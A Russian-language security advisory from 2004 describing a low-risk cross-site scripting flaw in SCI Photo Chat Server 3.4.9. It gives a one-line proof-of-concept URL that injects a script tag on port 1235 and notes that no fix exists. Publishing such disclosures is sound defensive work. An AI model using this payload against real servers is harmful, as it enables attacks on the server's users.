Межсайтовый скриптинг в SCI Photo Chat Server

Дата публикации:
04.07.2004
Всего просмотров:
828
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: SCI Photo Chat Server 3.4.9

Описание: Уязвимость в SCI Photo Chat Server позволяет удаленному пользователю выполнить XSS нападение.

Эксплоит:

http://[host]:1235/<script>alert("hy")</script>

URL производителя: http://www.simmcomm.ch/

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: XSS in SCI Photo Chat Server 3.4.9

или введите имя

CAPTCHA